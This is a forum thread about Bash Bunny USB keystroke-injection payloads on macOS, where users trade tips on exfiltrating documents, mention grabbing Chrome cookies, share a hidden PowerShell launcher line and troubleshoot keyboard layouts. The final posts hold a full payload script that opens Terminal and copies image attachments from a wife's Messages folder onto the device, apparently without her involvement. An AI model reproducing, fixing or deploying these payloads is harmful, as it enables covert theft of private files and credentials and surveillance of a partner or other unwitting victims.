WiFiJuice Posted September 3, 2017 Posted September 3, 2017 Guys, what Bash Bunny payloads have you got any success with on OS X?
Firestorm Posted September 3, 2017 Posted September 3, 2017 No. what is your problem with yours Bash Bunny.
Opticon Posted September 5, 2017 Posted September 5, 2017 @WiFiJuice I've been at this for a long time, as I bought the BB when it was first released. However, the following payloads never worked for me, and I was constantly looking for feedback over at Github: MacReverseShell, MacGetUsers, MacPFDExfil, etc. However, the one that has worked, and is easily modifiable to grab files from multiple directories, is macinfograbber. Great payload and I tip my hat to @kmakblob for this. Any other questions, please feel free to hit me up anytime :-)
couchTornado Posted September 7, 2017 Posted September 7, 2017 Granted this was my first attempt at running a payload from the BB on Mac OSX but even after choosing the correct ethernet device, the nmap payload failed because OSX requires root to run the OS fingerprinting functions. NMAP has been this way for a long time (even prior to the security upgrades introduced a couple of versions ago). Working at an art school we run MacOS everywhere (80-90% of our machines across academic and administrative units) I'll keep poking at it, but if anyone has an easy fix, I'm all ears.
WiFiJuice Posted September 7, 2017 Author Posted September 7, 2017 Awesome work with the Macinfograbber :) Thanks @Opticon. Hope we will have more Mac OS X payloads working on the BB soon. It's has a huge percentage of the operating system market share: http://gs.statcounter.com/os-market-share/all/united-states-of-america
Opticon Posted September 7, 2017 Posted September 7, 2017 Thank you @WiFiJuice. Macinfograbber, after altering code parameters, will fetch any document you'd like. I have mine set to go to the Desktop, Documents, and Home directories, and exfiltrate DOC, DOCX, PDF, PNG, JPG, JPEG, MOV, XLS, XLSX and more! I've tested the rewrite on several Macs and don't you know- it works on them all! However, @couchTornado has a valid point regarding NMAP and OSX. I'll start to work on something and share my results either here or on Github. Just a thought before I log off, but if NMAP can't be used, what if we just call upon something inherent to Terminal? Such as: Scan the available wireless networks: /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s Setup a network listener on port 2196 for testing: /usr/bin/nc -l 2196 Capture some packets: tcpdump -nS Capture all the packets:tcpdump -nnvvXS Capture the packets for a given port: tcpdump -nnvvXs 548 These are just a couple of things to consider while I toil away with a proper OSX NMAP hack. Cheers!
WiFiJuice Posted September 7, 2017 Author Posted September 7, 2017 @Opticon do you mind sharing your payload? Mine didn't work... Have a Swedish keyboard, so used "QUACK SET_LANGUAGE se" on top, but it didn't do the trick...
Opticon Posted September 7, 2017 Posted September 7, 2017 @WiFiJuice Not at all! Would you like me to post the code publicly, on this forum, Github etc...? Let me just go ahead and do all of the aforementioned, that way I'm not keeping secrets from anyone!
WiFiJuice Posted September 7, 2017 Author Posted September 7, 2017 3 hours ago, Opticon said: @WiFiJuice Not at all! Would you like me to post the code publicly, on this forum, Github etc...? Let me just go ahead and do all of the aforementioned, that way I'm not keeping secrets from anyone! @Opticon just sent you a DM :)
Opticon Posted September 7, 2017 Posted September 7, 2017 @WiFiJuice The DM has been sent and I hope you enjoy it! Let me know if there's anything you would add or subtract from the payload. Cheers!
Opticon Posted September 7, 2017 Posted September 7, 2017 For reasons unknown to myself, MacOS or OSX has been greatly overlooked where the Bash Bunny is concerned. Having extensive knowledge of the architecture to make an actual Mac exfiltration possible led me to this script. Previous deprecated versions of the original may exist, however, they were myopic in scope and failed upon execution. Allow me to introduce Mac Master Exfil, or MME 1.0, which I hope will guide other Mac enthusiasts to add to this project. It is currently pending approval at Github. DM me for the code. Thank you all :-)
Opticon Posted September 8, 2017 Posted September 8, 2017 Well @WiFiJuice I'll get working on it. However, here's a pertinent question, what firmware are you currently using? I've found 1.2 to be the most reliable firmware for the Bash Bunny. I've had nothing but trouble with 1.3. Restores and switches that won't execute payloads etc. What are your thoughts? I invite the entire community @couchTornado @Firestorm @Sebkinne @Darren Kitchen et al to answer. -Cheers
Dave-ee Jones Posted September 8, 2017 Posted September 8, 2017 Please don't tag everyone like that, if they deem it important enough for them to give their answer (Sebkinne answers if no one else has, or if he wants to add to something or if he wants to confirm something - but Darren rarely does). Not to mention you left me out ... :( I myself have had no problems with firmware 1.3, and most of the payload library works with 1.3, therefore not working with 1.2 very well. Not sure why you would be getting weird switch errors..
WiFiJuice Posted September 8, 2017 Author Posted September 8, 2017 How can I make something like this without Powershell? I want it to print out commands from a .txt file or similar saved on the Bash Bunny, but in OS X instead of Windows: QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"
PoSHMagiC0de Posted September 8, 2017 Posted September 8, 2017 2 hours ago, WiFiJuice said: How can I make something like this without Powershell? I want it to print out commands from a .txt file or similar saved on the Bash Bunny, but in OS X instead of Windows: QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')" Use python. Do not have the code off the top of my head right now but when I get around to it (too much at work right now and part of too many projects) I plan on making the BBTPS cross platform with the OSX and Linux agent parts being done in python. Issue with the above is I know on Linux you need to be root or using sudo to mount a removable drive. That is the reason I chose the network approach for the BBTPS so I do not have to worry about mounting anything on the victim.
WiFiJuice Posted September 8, 2017 Author Posted September 8, 2017 The Swedish language file is wrong @Sebkinne for example it can't write out a "~" correctly and messes up my code... How can this be fixed?
Opticon Posted September 8, 2017 Posted September 8, 2017 @WiFiJuice You bring up an excellent point, one that I would wished the developers would have anticipated. Hopefully, as you've addressed this problem before, they will look into resolving language files. Perhaps it's the reason my payload didn't work for you, but that's only speculation.
RazerBlade Posted September 8, 2017 Posted September 8, 2017 2 hours ago, WiFiJuice said: The Swedish language file is wrong @Sebkinne for example it can't write out a "~" correctly and messes up my code... How can this be fixed? Im also using the swedish keyboard layout. As with my experience the language file works great on windows but as you said spells out the character wrong.
RazerBlade Posted September 8, 2017 Posted September 8, 2017 It appears that to type ~ on Mac with Swedish Pro layout which most Swedish user do, it's alt + ¨ which the mac interprets as ~. So the keyboard file has to be changed.
WiFiJuice Posted September 8, 2017 Author Posted September 8, 2017 5 minutes ago, RazerBlade said: It appears that to type ~ on Mac with Swedish Pro layout which most Swedish user do, it's alt + ¨ which the mac interprets as ~. So the keyboard file has to be changed. Yes, that that little character is really important to be able to write out something like "~/Library/Application\\ Support/Google/Chrome/Default/Cookies"
WiFiJuice Posted September 10, 2017 Author Posted September 10, 2017 This is the layout of the Swedish Pro Keyboard. The se.json file in https://github.com/hak5/bashbunny-payloads/tree/master/languages is corrupt. It can't write out the very important Tilde sign " ~ " nor can it write out a backslash " \ ". Can anyone please help out to fix this issue? I will donate $50 in BTC to the one that fixes this, as I really need my BB to work.
quentin_lamamy Posted September 13, 2017 Posted September 13, 2017 I am actually work on OSX specific keyboard layout. At the moment to resolve keyboard issue on OSX sxitch to pc layout in keyboard setting
ImInAjar Posted January 4, 2019 Posted January 4, 2019 @Opticon do you have a git repository with some of your modifications? Im working on modifying InfoGrabber to retrieve pictures send via text from my wife's mac before she has to return it to work, but I cant get the following to work: QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \; script dies at this line with output find: -exec: no terminating ";" or "+" cant find any documentation on what may be happening. Any help would be great.
ImInAjar Posted January 4, 2019 Posted January 4, 2019 1 minute ago, ImInAjar said: @Opticon do you have a git repository with some of your modifications? Im working on modifying InfoGrabber to retrieve pictures send via text from my wife's mac before she has to return it to work, but I cant get the following to work: QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \; script dies at this line with output find: -exec: no terminating ";" or "+" cant find any documentation on what may be happening. Any help would be great. Full script: #!/bin/bash LED G R ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E lootdir=loot/MacLoot mkdir -p /root/udisk/$lootdir QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 5000 QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/images QUACK ENTER QUACK DELAY 500 QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \; QUACK ENTER # Sync filesystem sync # Green LED for finished LED G files=$(ls /Volumes/BashBunny/$lootdir/images/{*.jpg,*.jpeg,*.png} 2> /dev/null | wc -l) files2=$(ls /Volumes/BashBunny/$lootdir/images/{*.jpg,*.jpeg,*.png} 2> /dev/null | wc -l) if [ "$files" != "0" -o "$files2" != "0"]; then # Got spreadsheet files LED R B else LED R # No spread sheets fi #Eject BB QUACK diskutil unmount BashBunny; killall terminal
Recommended Posts
Archived
This topic is now archived and is closed to further replies.